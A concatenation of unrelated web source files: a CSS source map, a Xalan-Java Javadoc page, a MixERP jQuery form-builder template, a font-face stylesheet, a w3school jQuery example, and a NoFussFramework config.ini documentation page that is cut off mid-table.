/*# sourceMappingURL=data:application/json;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbInN0cnVjdHVyZS5zdHlsIl0sIm5hbWVzIjpbXSwibWFwcGluZ3MiOiJBQUFBLEtBQ0UsS0FBb0IsZ0NBRXRCLE9BQU8sVUFDTCxzQkFBdUIsSUFDdkIsbUJBQW9CLElBQ3BCLGNBQWUsSUFDZixNQUFNLEtBQ04sT0FBUSxlQUNSLFFBQVEsSUFDUixjQUFjLFVBQ2QsaUJBQWlCIiwiZmlsZSI6InN0cnVjdHVyZS5jc3MiLCJzb3VyY2VzQ29udGVudCI6WyJib2R5XHJcbiAgZm9udDogMTJweCBIZWx2ZXRpY2EsIEFyaWFsLCBzYW5zLXNlcmlmO1xyXG5cclxuYTpsaW5rLGE6dmlzaXRlZFxyXG4gIC13ZWJraXQtYm9yZGVyLXJhZGl1czogNXB4O1xyXG4gIC1tb3otYm9yZGVyLXJhZGl1czogNXB4O1xyXG4gIGJvcmRlci1yYWRpdXM6IDVweDtcclxuICBjb2xvcjojRkYwMDAwO1xyXG4gIGJvcmRlcjogMXB4IHNvbGlkICNDQ0M7XHJcbiAgcGFkZGluZzo1cHg7XHJcbiAgdGV4dC10cmFuZm9ybTp1cHBlcmNhc2U7XHJcbiAgYmFja2dyb3VuZC1jb2xvcjojQ0NDOyJdLCJzb3VyY2VSb290IjoiL3NvdXJjZS8ifQ== */ |
lib/xalan-j_2_7_0/docs/apidocs/org/w3c/dom/html/class-use/HTMLPreElement.html | MrStaticVoid/iriverter | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Sat Aug 06 17:04:43 EDT 2005 -->
<TITLE>
Xalan-Java 2.7.0: Uses of Interface org.w3c.dom.html.HTMLPreElement
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_top"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/w3c/dom/html/HTMLPreElement.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="HTMLPreElement.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
<CENTER>
<H2>
<B>Uses of Interface<br>org.w3c.dom.html.HTMLPreElement</B></H2>
</CENTER>
No usage of org.w3c.dom.html.HTMLPreElement
<P>
<HR>
<!-- ========== START OF NAVBAR ========== -->
<A NAME="navbar_bottom"><!-- --></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/w3c/dom/html/HTMLPreElement.html"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
PREV
NEXT</FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html" TARGET="_top"><B>FRAMES</B></A>
<A HREF="HTMLPreElement.html" TARGET="_top"><B>NO FRAMES</B></A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
Copyright © 2005 Apache XML Project. All Rights Reserved.
</BODY>
</HTML>
|
src/FrontEnd/MixERP.Net.FrontEnd/Views/Modules/FormFactory.html | mixerp6/mixerp | <div class="form factory ui segment" style="display: none;">
<div class="ui grey huge header">
<span class="title initial value"></span>
<span class="live"></span>
<div class="ui sub header"></div>
</div>
<div class="ui info description message" style="display: none;"></div>
<div class="ui stackable form" id="scrud" style="display: none;">
</div>
<div class="big error"></div>
<div class="ui buttons tpad8">
<a href="javascript:void(0);" class="ui green button" id="SaveButton">
<span data-localize="Titles.Save"></span>
</a>
<a href="javascript:void(0);" class="ui red button" id="CancelButton">
<span data-localize="Titles.Cancel"></span>
</a>
</div>
<script>
function initializeAjaxRequest() {
$.each(scrudFactory.keys, function () {
var el = $("[data-property=" + this.property + "]");
if (el.length) {
var selectedValue = "";
if (window.editData) {
selectedValue = window.editData[el.attr("data-property")];
};
if (this.url) {
ajaxDataBind(this.url, el, this.data, selectedValue, null, null, this.valueField, this.textField, this.isArray);
};
};
});
};
</script>
<script>
var metaInfo;
var metaCustomFields;//custom fields
var saveButton = $("#SaveButton");
var scrud = $("#scrud");
var cancelButton = $("#CancelButton");
var scrudForm = $(".form.factory");
var scrudView = $(".view.factory");
var grid = [undefined, "one", "two", "three", "four", "five", "six", "seven", "eight", "nine", "ten", "eleven", "twelve", "thirteen", "fourteen", "fifteen", "sixteen"];
var editData;
var dropdownsLoaded = false;
var defaultValuesLoaded = false;
var formReady = false;
</script>
<script>
if (scrudFactory.title) {
$(".title").html(scrudFactory.title);
};
if (scrudFactory.description) {
$(".description").html(scrudFactory.description);
$(".description").show();
} else {
$(".description").remove();
};
function getReturnUrl() {
var returnTo = getQueryStringByName("ReturnUrl");
if (returnTo) {
var qs = getQueryStrings();
$.each(qs, function (i, v) {
if (v.key !== "ReturnUrl") {
returnTo = updateQueryString(v.key, v.value, returnTo);
};
});
};
if (!returnTo) {
returnTo = window.returnUrl;
};
return (returnTo || "");
};
function showView() {
var url = updateQueryString("View", "kanban");
window.history.pushState({ path: url }, '', url);
window.scrudForm.hide();
$("div[data-target]").hide();
$("[data-target]").removeClass("active");
$('[data-target="kanban"]').show().addClass("active");
window.scrudView.fadeIn(500);
loadPageCount(loadGrid);
};
cancelButton.click(function () {
var confirmed = confirmAction();
if (!confirmed) {
return;
};
resetForm();
if (window.scrudView.length) {
showView();
};
if (getReturnUrl()) {
document.location.href = getReturnUrl();
};
});
saveButton.click(function () {
var isValid = validate();
if (!isValid) {
return;
};
saveButton.addClass("loading");
var bigError = $(".big.error");
var entity = new Object();
var customFields = [];
bigError.removeClass("bpad16").html("");
function getFormValue(columnName, dataType, isSerial) {
var el = $("#" + columnName);
var val = null;
if (el.length) {
val = el.val();
switch (dataType) {
case "System.Boolean":
case "bool":
val = val === "yes" ? true : false;
break;
default:
val = val.toString().trim();
if (el.is("select")) {
if (!val) {
val = null;
};
};
break;
};
};
if (isSerial) {
if (isNullOrWhiteSpace(val)) {
val = null;
};
};
return val;
};
$.each(metaInfo.Columns, function (i, v) {
var value = getFormValue(v.ColumnName, v.DataType, v.IsSerial);
entity[v.PropertyName] = value;
});
if (window.metaCustomFields) {
$.each(window.metaCustomFields, function (i, v) {
var dataType = getCustomFieldDataType(v);
var value = getFormValue(v.FieldName, dataType, false);
var customField = new Object();
customField.FieldName = v.FieldName;
customField.Value = value;
customFields.push(customField);
});
};
var ajaxAddOrEdit = addOrEdit(entity, customFields);
ajaxAddOrEdit.success(function () {
saveButton.removeClass("loading");
var confirmed = confirm(window.Resources.Labels.TaskCompletedSuccessfullyReturnToView());
resetForm();
if (confirmed) {
window.scrudForm.hide();
if (getReturnUrl()) {
window.location.href = getReturnUrl();
};
if (window.scrudView.length) {
showView();
};
};
});
ajaxAddOrEdit.fail(function (xhr) {
var error = getAjaxErrorMessage(xhr);
saveButton.removeClass("loading");
bigError.addClass("bpad16").text(error);
});
});
function resetForm() {
var fields = $(".form-field, .custom-field");
$(".uploader.field .ui.image.preview").attr("src", "/Static/images/mixerp-logo-light.png");
$.each(fields, function () {
var el = $(this);
var defaultValue = el.attr("data-default-value");
if (!defaultValue) {
defaultValue = "";
};
if (el.hasClass("dropdown")) {
if (!el.hasClass("disabled")) {
var select = el.find("select");
var search = el.find(".search");
var text = el.find(".text");
select.val("");
search.html("");
text.html("");
};
} else {
el.val(defaultValue);
el.attr("data-val", defaultValue);
};
});
};
function validate() {
var required = $(".form.factory #scrud [required]:not(:disabled):not([readonly])");
required.trigger("blur");
var errorFields = window.scrudForm.find(".error:not(.big.error)");
$.each(errorFields, function (i, v) {
var label = $(v).find("label");
console.log(label.html() + " is required");
});
var errorCount = errorFields.length;
if (!errorCount) {
if (typeof (window.customFormValidator) === "function") {
var isValid = window.customFormValidator();
return isValid;
};
return true;
};
return false;
};
function getSchema() {
return scrudFactory.formTableName.split(".")[0];
};
function getCustomFields() {
var url = scrudFactory.formAPI + "/custom-fields";
var queryString = getQueryStringByName(scrudFactory.queryStringKey || "");
if (queryString) {
url += "/" + queryString;
};
return getAjaxRequest(url);
};
function getFormView() {
var url = scrudFactory.formAPI + "/meta";
return getAjaxRequest(url);
};
function addOrEdit(entity, customFields) {
var url = scrudFactory.formAPI + "/add-or-edit";
var form = [];
form.push(entity);
form.push(customFields);
var data = JSON.stringify(form);
return getAjaxRequest(url, "PUT", data);
};
</script>
<script>
function showForm() {
window.scrudForm = $(".form.factory");
window.scrudView = $(".view.factory");
var defaultView = window.getQueryStringByName("View");
if ((defaultView || "") === "FormView") {
if (window.scrudView.length) {
window.scrudView.hide();
};
window.scrudForm.fadeIn(500);
} else {
if (window.scrudView.length) {
window.scrudForm.hide();
} else {
window.scrudForm.fadeIn(500);
};
};
};
//$(window).load
$(document).ready(function () {
loadEdit();
});
$(document).ajaxStop(function () {
$("#scrud").show();
$("#scrud").parent().removeClass("loading");
loadDefaultValues();
loadDropdowns();
setRegionalFormat();
loadDatepicker();
triggerFormReadyEvent();
});
function triggerFormReadyEvent() {
if (!window.formReady) {
window.formReady = true;
$(document).trigger("formready");
showForm();
};
};
function loadDefaultValues() {
if (defaultValuesLoaded) {
return;
};
var qs = getQueryStrings();
$.each(qs, function (i, v) {
var name = v.key;
var value = v.value;
var el = $("[data-property=" + name + "]");
if (el.length) {
if (el.is("select")) {
el.addClass("disabled");
el.attr("data-value", value);
el.attr("data-default-value", value);
} else {
el.val(value);
};
};
});
$("input.live").trigger("keyup");
defaultValuesLoaded = true;
};
function loadDropdowns() {
if (!dropdownsLoaded) {
var dropdowns = $(".form.factory select");
dropdowns.each(function (i, v) {
var dropdown = $(v);
var selectedValue = (dropdown.getSelectedValue() || "");
if (!selectedValue) {
selectedValue = dropdown.attr("data-value");
if (selectedValue) {
dropdown.val(selectedValue);
};
};
dropdown.dropdown({ placeholder: false });
});
dropdownsLoaded = true;
};
};
function createForm() {
var ajaxGetFormView = getFormView();
ajaxGetFormView.success(function (msg) {
window.metaInfo = msg;
createLayout(msg.Columns);
if (getSchema()) {
var ajaxGetCustomFields = getCustomFields();
ajaxGetCustomFields.success(function (msg) {
metaCustomFields = msg;
createCustomFields(metaCustomFields);
});
};
});
};
function chunk_array(arr, len) {
return arr.map(function (e, i) {
return i % len === 0 ? arr.slice(i, i + len) : null;
})
.filter(function (e) { return e; });
};
function getCustomFieldDataType(customField) {
var type = "varchar";
if (customField.IsNumber) {
type = "numeric";
};
if (customField.IsDate) {
type = "date";
};
if (customField.IsBoolean) {
type = "bool";
};
if (customField.IsLongText) {
type = "text";
};
return type;
};
function mapColumnFrom(customField) {
var column = new Object();
column.ColumnName = customField.FieldName;
column.PropertyName = customField.FieldName;
column.FieldLabel = customField.FieldLabel;
column.IsCustomField = true;
column.DbDataType = getCustomFieldDataType(customField);
column.IsNullable = true;
column.IsSerial = false;
column.IsPrimaryKey = false;
column.MaxLength = 0;
column.Value = customField.Value;
column.Description = customField.Description;
return column;
};
function createCustomFields(customFields) {
if (customFields.length) {
var header = $("<div class='ui purple large header'/>");
header.text(window.Resources.Titles.CustomFields());
scrud.append(header);
scrud.append("<div class='ui divider'></div>");
};
for (var i = 0; i < customFields.length; i += 2) {
var fields = $("<div class='fields' />");
var leftField = mapColumnFrom(customFields[i]);
createColumn(fields, leftField, "four wide field");
if (i + 1 < customFields.length) {
var rightField = mapColumnFrom(customFields[i + 1]);
createColumn(fields, rightField, "four wide field");
};
if (fields.children().length > 0) {
scrud.append(fields);
};
};
};
function createLayout(collection) {
var skip = [];
if (typeof (scrudFactory.layout) !== "undefined") {
$.each(scrudFactory.layout, function (i, currentLayout) {
var actualColumns = _.uniq(currentLayout);
var fieldWith = 16 / currentLayout.length;
var fields = $("<div class='fields' />");
$.each(actualColumns, function (index, propertyName) {
var value = _.findIndex(collection, { "PropertyName": propertyName });
if (value >= 0) {
skip.push(value);
var weight = currentLayout.reduce(function (x, y) {
return x + (y === propertyName);
}, 0);
var cssClass = grid[fieldWith * weight] + " wide field";
createColumn(fields, collection[value], cssClass);
};
});
if (fields.children().length > 0) {
scrud.append(fields);
};
});
};
var range = _.range(collection.length);
var missing = $(range).not(skip).get();
missing = chunk_array(missing, 2);
$.each(missing, function () {
fields = $("<div class='fields' />");
createColumn(fields, collection[this[0]], "four wide field");
if (this[1] !== undefined) {
createColumn(fields, collection[this[1]], "four wide field");
};
if (fields.children().length > 0) {
scrud.append(fields);
};
});
initializeAjaxRequest();
initializeUploader();
initializeValidators();
var initialValue = $(".initial.value").html();
$("input.live").keyup(function () {
var val = $(this).val();
if (!val.length) {
$(".initial.value").html(initialValue);
$(".huge.header .sub.header").html("");
$(".live:not(input)").html("");
} else {
$(".initial.value").html("");
$(".huge.header .sub.header").html(initialValue);
$(".live:not(input)").html(val);
};
});
$("input.live").trigger("keyup");
};
function loadEdit() {
var queryString = getQueryStringByName(scrudFactory.queryStringKey || "");
if (!queryString) {
createForm();
return;
};
function getViewForEdit(primaryKeyValue) {
var url = scrudFactory.formAPI + "/" + primaryKeyValue;
return getAjaxRequest(url);
};
var ajaxGetViewForEdit = getViewForEdit(queryString);
ajaxGetViewForEdit.success(function (msg) {
editData = msg;
createForm();
});
};
function initializeValidators() {
$(".dropdown input.search").blur(function () {
$(this).parent().find("select").trigger("blur");
});
$(".form.factory [required]:not(:disabled):not([readonly])").blur(function () {
var el = $(this);
var val = el.val();
var errorMessage = el.closest(".field").find(".error-message");
if (!errorMessage.length) {
errorMessage = $("<span class='error-message' />");
el.closest(".field").append(errorMessage);
};
if (isNullOrWhiteSpace(val)) {
isValid = false;
makeDirty(el);
el.closest(".field").find(".error-message").html(Resources.Labels.ThisFieldIsRequired());
} else {
removeDirty(el);
el.closest(".field").find(".error-message").html("");
};
});
};
function mergeArray(array) {
var merged = [];
for (var i = 0; i < array.length; i++) {
merged = merged.concat(array[i]);
}
return merged;
};
function createColumn(el, column, cssClass) {
if (typeof (column) === "undefined") {
return;
};
if (["audit_user_id", "audit_ts"].indexOf(column.ColumnName) >= 0) {
return;
};
var field = $("<div/>");
field.addClass(cssClass);
var label = $("<label/>");
if (column.FieldLabel) {
label.text(column.FieldLabel);
} else {
label.text(getLabel(column.ColumnName));
};
label.attr("for", column.ColumnName);
var element = getField(column.PropertyName, column.DbDataType, column.IsNullable);
element.attr("id", column.ColumnName);
if (column.DbDataType.indexOf("strict") > -1) {
element.attr("data-validation", column.DbDataType);
};
element.attr("data-property", column.PropertyName);
element.attr("data-type", column.DbDataType);
if (typeof (scrudFactory.live) !== "undefined") {
if (column.PropertyName === scrudFactory.live) {
element.addClass("live");
};
};
if (typeof (scrudFactory.readonlyColumns) === "undefined") {
scrudFactory.readonlyColumns = [];
};
if (typeof (scrudFactory.hiddenColumns) === "undefined") {
scrudFactory.hiddenColumns = [];
};
if (scrudFactory.readonlyColumns.indexOf(column.PropertyName) > -1) {
element.attr("readonly", "");
};
if (scrudFactory.hiddenColumns.indexOf(column.PropertyName) > -1) {
field.addClass("hidden");
};
if (column.IsSerial) {
element.attr("readonly", "readonly");
};
if (column.IsPrimaryKey) {
element.attr("data-primaryKey", "");
element.removeClass();
};
if (column.MaxLength > 0) {
element.attr("maxlength", column.MaxLength);
};
if (!column.IsNullable) {
element.attr("required", "required");
field.addClass("required");
};
var value = column.Value;
if (window.editData) {
if (window.editData.hasOwnProperty(column.PropertyName)) {
value = window.editData[column.PropertyName];
};
};
if (element.hasClass("date")) {
value = value.toFormattedDate();
};
if (element.attr("data-type") === "time") {
value = getTime(value);
};
if (column.DbDataType === "bool") {
value = value ? "yes" : "no";
};
if (value) {
element.attr("data-value", value);
element.val(value);
};
if (column.IsCustomField) {
element.addClass("custom-field");
} else {
element.addClass("form-field");
};
field.append(label);
field.append(element);
if (column.Description) {
field.append("<span class='ui basic pointing label'>" + column.Description + "</span>");
};
el.append(field);
};
function getField(propertyName, dataType, nullable) {
if (typeof (scrudFactory.keys) === "undefined") {
scrudFactory.keys = [];
};
var hasKey = Enumerable.From(scrudFactory.keys)
.Where(function (x) { return x.property === propertyName }).ToArray()[0];
if (hasKey) {
return $("<select class='ui search fluid dropdown' />");
};
switch (dataType) {
case "image":
return $("<input type='text' class='image' />");
case "int4":
case "int8":
case "integer_strict":
case "integer_strict2":
return $("<input type='text' class='integer' />");
case "float8":
case "decimal":
case "decimal_strict":
case "numeric":
return $("<input type='text' class='decimal' />");
case "money_strict2":
case "money_strict":
return $("<input type='text' class='currency' />");
case "text":
return $("<textarea />");
case "date":
return $("<input type='text' class='date' />");
case "bool":
var el = $("<select class='ui search dropdown' />");
var option = "<option";
if (nullable) {
option += " value='Select'>";
} else {
option += " value=''>";
};
option += Resources.Titles.Select() + "</option>";
option += "<option value='yes'>" + Resources.Titles.Yes() + "</option>";
option += "<option value='no'>" + Resources.Titles.No() + "</option>";
el.append(option);
return el;
default:
return $("<input type='text' />");
};
};
function tryParseLocalizedResource(text) {
var localized = executeFunctionByName("Resources.Titles." + text, window);
if (!localized) {
localized = executeFunctionByName("Resources.ScrudResource." + text, window);
};
if (localized) {
return localized;
};
return text;
};
function getLabel(columnName) {
return tryParseLocalizedResource(columnName);
};
$(document).keydown(function (event) {
if (event.ctrlKey) {
if (event.key === "Enter") {
$("#SaveButton").trigger("click");
return false;
};
};
});
</script>
</div>
<script src="/Scripts/mixerp/utitlities/localizable.js"></script> |
wp-content/themes/cbox-theme/assets/fonts/font.css | karysto/cord-network | @font-face {
font-family: 'iconSweetsRegular';
src: url('iconsweets-webfont.eot');
src: url('iconsweets-webfont.eot?#iefix') format('embedded-opentype'),
url('iconsweets-webfont.woff') format('woff'),
url('iconsweets-webfont.ttf') format('truetype'),
url('iconsweets-webfont.svg#iconSweetsRegular') format('svg');
font-weight: normal;
font-style: normal;
}
|
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtext7913.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jquery_traversing_slice_2 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:12:19 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<head>
<script type="text/javascript" src="../jquery/jquery.js"></script>
</head>
<body>
<ul>
<li>list item 1</li>
<li>list item 2</li>
<li>list item 3</li>
<li>list item 4</li>
<li>list item 5</li>
</ul>
<script>
$('li').slice(2).css('background-color', 'red');
</script>
</body>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=jquery_traversing_slice_2 by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:12:19 GMT -->
</html> |
html/docs/configuration/config.ini/index.html | jarnix/nofussframework.com | <!DOCTYPE html>
<!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
<!--[if gt IE 8]><!-->
<html class="no-js" lang="en">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>config.ini - app settings - NoFussFramework Documentation</title>
<link rel="shortcut icon" href="../../img/favicon.ico">
<link
href='https://fonts.googleapis.com/css?family=Lato:400,700|Roboto+Slab:400,700|Inconsolata:400,700'
rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="../../css/theme.css"
type="text/css" />
<link rel="stylesheet" href="../../css/theme_extra.css"
type="text/css" />
<link rel="stylesheet" href="../../css/highlight.css">
<script>
// Current page data
var mkdocs_page_name = "config.ini - app settings";
var mkdocs_page_url = "/configuration/config.ini/";
</script>
<script src="../../js/jquery-2.1.1.min.js"></script>
<script src="../../js/modernizr-2.8.3.min.js"></script>
<script type="text/javascript" src="../../js/highlight.pack.js"></script>
<script src="../../js/theme.js"></script>
<script>
(function(i, s, o, g, r, a, m) {
i['GoogleAnalyticsObject'] = r;
i[r] = i[r] || function() {
(i[r].q = i[r].q || []).push(arguments)
}, i[r].l = 1 * new Date();
a = s.createElement(o), m = s.getElementsByTagName(o)[0];
a.async = 1;
a.src = g;
m.parentNode.insertBefore(a, m)
})(window, document, 'script', '//www.google-analytics.com/analytics.js',
'ga');
ga('create', 'UA-30907299-4', 'auto');
ga('send', 'pageview');
</script>
</head>
<body class="wy-body-for-nav" role="document">
<header>
<a class="logo" href="/">NoFussFramework</a>
<ul>
<li><a href="/docs/">Documentation</a></li>
<li><a href="/download/">Download</a></li>
<li><a href="/community/">Community</a></li>
</ul>
</header>
<div class="wy-grid-for-nav">
<nav data-toggle="wy-nav-shift" class="wy-nav-side stickynav">
<div class="wy-side-nav-search"><div role="search">
<form id ="rtd-search-form" class="wy-form" action="../../search.html" method="get">
<input type="text" name="q" placeholder="Search docs" />
</form>
</div>
</div>
<div class="wy-menu wy-menu-vertical" data-spy="affix"
role="navigation" aria-label="main navigation">
<ul class="current">
<li>
<li class="toctree-l1 ">
<a class="" href="../..">Documentation Home</a>
</li>
<li>
<li>
<li class="toctree-l1 ">
<a class="" href="../../intro/introduction/">Introduction</a>
</li>
<li>
<li>
<li class="toctree-l1 ">
<a class="" href="../../setup/try-it-now/">Try it now</a>
</li>
<li>
<li>
<ul class="subnav">
<li><span>Getting started</span></li>
<li class="toctree-l1 ">
<a class="" href="../../setup/requirements/">Requirements</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../setup/installation/">Installation</a>
</li>
</ul>
<li>
<li>
<ul class="subnav">
<li><span>Configuration</span></li>
<li class="toctree-l1 ">
<a class="" href="../introduction/">Introduction</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../overview/">Overview</a>
</li>
<li class="toctree-l1 current">
<a class="current" href="./">config.ini - app settings</a>
<ul>
<li class="toctree-l3"><a href="#error-display">Error display</a></li>
<li class="toctree-l3"><a href="#error-reporting">Error reporting</a></li>
<li class="toctree-l3"><a href="#error-logging">Error logging</a></li>
<li class="toctree-l3"><a href="#forbidden-pages-logging-display">Forbidden pages / logging / display</a></li>
<li class="toctree-l3"><a href="#view-engines">View engines</a></li>
<li class="toctree-l3"><a href="#all-the-other-settings-are-optional">All the other settings are optional</a></li>
</ul>
</li>
<li class="toctree-l1 ">
<a class="" href="../config.ini-optional/">config.ini - optional settings</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../config.ini-more/">config.ini - going further</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../url.ini/">url.ini</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../routes/">routes</a>
</li>
</ul>
<li>
<li>
<ul class="subnav">
<li><span>Development</span></li>
<li class="toctree-l1 ">
<a class="" href="../../development/bootstrap/">Bootstrap</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/controllers/">Controllers</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/models/">Models</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/views/">Views</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/helpers/">Helpers: Settings, Config, Env, Registry, etc</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/db/">Database queries</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/input-data/">Getting input</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/input-filtering/">Input filtering</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/cache/">Cache</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/vendor/">External classes</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/performance/">Performance</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../development/middlewares/">Middlewares</a>
</li>
</ul>
<li>
<li>
<ul class="subnav">
<li><span>Reference</span></li>
<li class="toctree-l1 ">
<a class="" href="../../reference/http-exceptions/">default http exceptions</a>
</li>
<li class="toctree-l1 ">
<a class="" href="../../reference/sessions-table/">sessions table structure</a>
</li>
</ul>
<li>
</ul>
</div>
</nav>
<section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">
<nav class="wy-nav-top" role="navigation" aria-label="top navigation">
<i data-toggle="wy-nav-top" class="fa fa-bars"></i> <a
href="../..">NoFussFramework Documentation</a>
</nav>
<div class="wy-nav-content">
<div class="rst-content">
<div role="navigation" aria-label="breadcrumbs navigation">
<ul class="wy-breadcrumbs">
<li><a href="../..">Docs</a> »</li>
<li>Configuration »</li>
<li>config.ini - app settings</li>
<li class="wy-breadcrumbs-aside">
<a href="https://github.com/jarnix/nofussframework" class="icon icon-github"> Download on GitHub</a>
</li>
</ul>
<hr/>
</div>
<div role="main">
<div class="section"> <p>This is where you will setup your application:</p>
<ul>
<li>database connections</li>
<li>memcache</li>
<li>session handler</li>
<li>etc</li>
</ul>
<p>It's a basic .ini file that can be read and written easily by any human. Definitely not a JSON or XML or even PHP which is worse of course.</p>
<h1 id="error-display">Error display</h1>
<p>Note that the error level is of course set to E_ALL. </p>
<table>
<thead>
<tr>
<th>Key</th>
<th>Values</th>
<th>Default</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>error.displayPHPErrors</td>
<td>off<br>on</td>
<td>(none)</td>
<td>Should the application display the basic php errors (in dev environment you should set it to "on", and in production to "off"). The main exceptions will be catched, we are talking about the basic php errors like typos etc</td>
</tr>
<tr>
<td>error.displayMethod</td>
<td>screen<br>forward</td>
<td>(none)</td>
<td>Display the errors on "screen" or within another controller/method ("forward") for friendly error reporting.</td>
</tr>
<tr>
<td>error.clearResponse</td>
<td>false<br>true</td>
<td>false</td>
<td>Should the application clean the response before displaying the error</td>
</tr>
</tbody>
</table>
<h1 id="error-reporting">Error reporting</h1>
<table>
<thead>
<tr>
<th>Key</th>
<th>Values</th>
<th>Default</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>error.forward.module</td>
<td>home</td>
<td>(none)</td>
<td>The module to use when you forward errors.</td>
</tr>
<tr>
<td>error.forward.controller</td>
<td>error</td>
